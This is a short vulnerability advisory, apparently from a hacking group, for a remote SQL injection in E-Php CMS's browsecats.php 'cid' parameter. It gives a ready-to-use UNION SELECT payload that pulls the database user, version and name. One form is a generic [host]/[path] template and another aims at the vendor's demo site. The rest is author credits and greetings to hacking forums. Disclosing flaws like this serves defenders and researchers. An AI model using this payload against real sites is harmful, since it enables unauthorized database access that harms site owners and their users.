############################################################################################################################ #E-Php CMS (browsecats cid) Remote SQL Injection Vulnerability # #==========================================================================================================================# # # #Critical Level : Dangerous # # # #Venedor site : http://www.ephpscripts.com/ # # # # # # # #==========================================================================================================================# # # #Exploit : # #-------------------------------- # # # #[host]/[path]/browsecats.php?cid=-1+union+select+1,concat(user(),version(),database()),3,4,5,6,7,8,9,10,11,12-- # # # #Example : # #-------------------------------- # # # #ephpscripts.com/demo/cms/browsecats.php?cid=-9+union+select+1,concat(user(),version(),database()),3,4,5,6,7,8,9,10,11,12--# # # #==========================================================================================================================# #Discovered by : -tmh- # # # #Contact : tmh[at]sys-flaw.com # # # #Home : http://www.sys-flaw.com/ && http://www.kartoffel-hack.com/ # # # #Greetz to : n00bor , Five-Three-Nine , J0hn.X3r , electron1x , meckl , Floo , -Patrick_B , abcdef , # # Loader007 , bizzit , Sys-Flaw , Codesoft , Free-Hack # # # ############################################################################################################################